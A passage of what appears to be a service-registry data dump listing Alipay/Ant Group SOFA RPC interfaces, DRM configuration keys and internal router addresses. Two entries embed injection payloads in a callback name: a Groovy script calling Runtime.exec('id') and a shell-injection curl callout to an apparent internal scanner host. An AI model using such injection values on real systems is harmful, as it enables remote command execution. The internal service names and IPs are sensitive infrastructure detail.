R","DATA_ID_11.167.172.136#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0.0:mif_antProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:cn.com.antcloud.guardianconsole.facade.configs.service.GuardianConfigFacade:1.0:zmguardianconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:{\"lang\":\"groovy\",\"script\": \"java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"id\\\").getText()\"}@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.v2.quality.facade.QualityRuleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.whitelist.service.AfscWhiteListService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.client.api.ApiTestFacade:1.0:zimtmsvcprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.rec.api.RecSceneServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:mcardcenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.uniquery.facade.UniQueryService:1.0:cif_cz@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobile.component.amcs.realtimeconfig.facade.AppManagementService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_LEIYING_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opscloudcore.common.service.facade.iteration.ChangeIterationRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.166.159#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.afwrobottwa:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.businessPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.18.116.159#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.findecision:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finslip.common.service.facade.notify.RemedyNotifyService:1.0:remedyFinInflux@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.PcardUnionFundFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradequote.api.TickQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.guardian_client:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkMvelBlackKeyWords,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.imasp.common.service.facade.relation.PlayUserRelationQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestprod.facade.settle.SettleConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileua.common.service.api.ApplyBizService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundselling.share.redeem.service.RedeemTransactionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.ArgoTrProxyFacade:1.0:gfinsight@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fincommonbff:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.debug,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.commandcenter:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmEmergencyActions,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.afsc.common.service.assistinvestigate.feedbackaddress.facade.FeedbackAddressInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mappprod.common.service.facade.appuser.MerchantAppUserQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.217.96#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.iagreemtcenter.common.service.facade.api.digital.DigitalAgreementManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instopen.service.facade.InstAcctSettleService:1.0:instopen@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.igtransferprodTairCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.33.245#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cicada.bizide.common.service.facade.api.BizArchetypeProjectCreatorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.biz.rpc.service.VoiceToTextFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.180.24#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.167.144.91#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.client.SystemAppInvokeService:1.0:dchainprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:codfund@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.serverlesscore.YamlTestApi5Service:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.amsAssistantTBaseCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.afsc.common.service.tis.service.ServiceDefService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.process.facade.AssetBpInstanceProcessQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_EBPPRECON#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.pointmng:name=com.alipay.pointmng.common.service.integration.drm.VoucherConfigResource.pcreditFQRecoverPartnerId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appstore.common.service.facade.commodity.MerchandiseOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetFluxService:1.0:guarcoreFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mrchservbase.biz.service.leads.facade.OpportunityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.gfas:name=com.alipay.accha.core.drm.FailoverSwitchDrmResource.prepCheckfailoverStatus1,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchiscore.rabbit.common.service.facade.RabbitStatisticsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dponeservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:bizfund@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.schedule.operation.platform.facade.overview.OverviewApi:1.0:dpoperationplatform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepromo.common.service.facade.offlinetaobao.ActiveLotteryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdsroalipay.facade.dataos.DataOsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpdcore:name=com.alipay.fc.pdcore.common.service.cacheclient.drm.ClientCacheConfigDRM.closeClientCacheLocalCache,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.19.29.228#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.82.87.107#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbcontent.common.service.facade.api.article.ArticleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.counter.api.CounterFacadeV2:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.33.205#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.166.231.8#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ecoqltprod.biz.eco.service.EcoDetectSerialService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.tradeexprod.service.integration.drm.resource.WkprodExrateSwitchResource.useExrateClient,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:muac@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.metadata.VersionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.44#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:finfocore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscheck.service.facade.api.QcDialogFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuprod.biz.community.user.SecuInstitutionService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.octopus.core.facade.InvokeFacade:1.0:vehownerprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:filecore#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.167.116.223#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0:cstask_generateFundsProveCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:fxwagdsad@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:normalTestAbilityCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.shadowReadCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchstoreapp.common.service.facade.store.query.EcardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaascoreng.facade.ops.ResourceDecorationBaselineOpsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCurUserStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acorchestracore.endpoint.sofarest.ServiceCacheRestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.EmergencyQuserCardModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.46.45#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:antinvoice_serverEnterAuditFailCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.riskservice.spi.OpsChngAsyncRiskService:1.0:dmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accenter.service.facade.api.AccenterAccountTemplateManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chargefront.service.facade.api.ChargeFrontPointFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.antchain.myentcore.common.service.facade.api.ProvisionOperationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cstraining.common.service.facade.resource.api.CstResourceInfoQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.ScriptEvalServiceFacade:1.0:publicDomain_agdsdatahub@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.20.148.21#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insclaimportal.common.service.InsClaimMechantUserInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.astaralarm.common.service.facade.tvm.vul.VulDelayManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.mrch.common.service.view.api.BatchCommonViewOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.envcenter:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.etetestcore:name=com.alipay.etetestcore.service.integration.discount.drm.DstCampCommonDrm.operateDstCampConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditagreement.common.service.agreement.main.PcreditAgreementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:insscenebff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchpunish.facade.cicada.merchantHome.PunishmentQueryFromMerchantHome:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:\";curl http://33024869-uniqueId-104003027.antscanner.global.alipay.com;\"@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:custcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.zpaas.zpaas_ds.validator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.paymentmng.SHAREDATADataSource.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cicada.cide.common.service.facade.api.DtDeployFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointprod.common.util.resource.QuickPointRecoveryDrmResouce.recoveryPids,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mbillexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.download.DownloadCenterCallbackInterface:1.0:pcMyShopListDownload@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.share.MultiSerialNoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscheck.service.facade.api.OperationLogFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.htmRefererCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkloanapply.facade.normalapply.service.NormalApplyQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbretailprod.common.facade.mall.homepage.MallShopInfoListQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dataqualitytestsvr.flowtestfacade.facade.FlowDataExplorerServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:appstore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.split.Splitor:1.0:alertSplitor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.mitemcenter.MicQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.api.hk.HkInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.246.223#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mwealthprod.common.service.facade.YouthTransferQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.service.facade.mng.TenantQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:autoinsprod_addUserCarCertifiedCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:DECISIONX@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.84#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cloudengine:name=com.alipay.cloudengine.loglevel.clearingcenter.logLevelConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:custcenterprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.73.150.156#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_KBCRAFTSMAN#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_CRM_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.csmonitor.common.service.facade.riskfactor.RiskFactorCommonService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.134.188#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.pointmng:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.bluearmyprod:name=com.alipay.bluearmyprod.core.service.drm.DBConfigDRMConfig.dsType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.iexchange.service.inner.ForeignExchangeTaskService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.mpoint.facade.MpointMonthSummaryQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.12#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.timeout.common.service.facade.spi.TimeoutCallbackHandler:1.0:autoaftermarketunit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwmdas.common.service.facade.PermissionActionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.familycore.facade.FamilyZmgoSharingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.biz.lisa.service.eworkcard.EntEmployeeRelationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.rec.api.RecSceneAuthorizationQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.insttrade.core.service.drm.AcsAccountDRM.webFileBeginDate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csactive.common.service.facade.mng.api.EventRelationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudprovision:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInOsValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.resultwrap:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promoorder.common.service.facade.api.PromoOrderFacade:1.0:mrchorder@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.opssla.DrmOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.opencore.service.facade.message.TopicMsgSubQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:yungenew@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.bizfundprod.common.service.facade.spi.mobilegw.BankInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finopencore.common.service.interaction.facade.UserAnswerQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.core.service.guardian.GroovyExecuteCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mquery.common.service.facade.report.FundLogReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oceanbase.obforumcore.service.miniapp.miniappfacade.MiniappQuestionnaireManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileapp.common.service.facade.mpaas.SidTokenValidateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pccontractprod.common.service.facade.admin.api.DecisionElementAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frdecision.common.service.facade.api.DecisionSchemeManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.xxePayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:https://www.baidu.com@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodcore.service.api.rate.RateQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finlinkdata.common.service.facade.business.accountorder.service.AccountOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.diskLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.fininfoDataTairCache.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_QUOTATIONCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.98.3#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.iWFBizProdCommonCacheTBaseCache.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.fcbuservice.common.service.facade.PermissionFacade:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dms.common.service.ExpScheduleTrigger:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.common.security.dresource.SecurityCommonDrm.corsWhiteHostList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.158.251#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mfinquotationprod.common.service.facade.api.StockAnnouncementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imatchfacade.common.service.facade.event.ActivityEventNotifyApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.xssClientPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.218.36#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promoprod.common.service.facade.explosion.ExplosionCampUserStatusQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.231.89#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.opinioncore:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pvsofaserver.facade.ZproxyCPvSofaService:1.0:zproxyCForMR@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.taobao.chongzhimobile.client.PhoneUnitService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.248.11#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:vmonetaryprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.core.AutoCoreComCityConfigFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscheck.service.facade.api.BatchProcessFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.transfercenter.common.service.facade.api.TransferRZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:opensupport_onstopmng_flowArrangeCoreGatewayFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.share.SerialNoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.191.231#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.miniprod.common.service.facade.api.miniclientop.MiniClientOpConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ecdcc:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.crmhome.common.service.facade.api.topic.TopicQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.wealthdecisionsys.facade.page.AlarmCommonConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iassetcenter.service.facade.api.query.UserAssetProfileQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.174.16#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","HEALTHY_V2@openevent#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.minicenter.common.service.facade.api.paas.InstMiniAppOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_B_USER_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cschannel.common.service.facade.api.prod.mng.ServProdCardMngService:1.0:incService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insofflineinvest.common.service.facade.service.UniversalMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.apsdk.settlement.apis.UnholdMerchantService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSprControlDrmResource.fundApplyMaxRetryCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zpaascoreng.facade.ops.DoubleEngineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:isasp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:emccenter_antprocess_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.core.service.cache.EinvLdcCacheManager:1.0:einvCzoneCacheManager@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aclinkedcore.common.service.facade.PipelineService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapte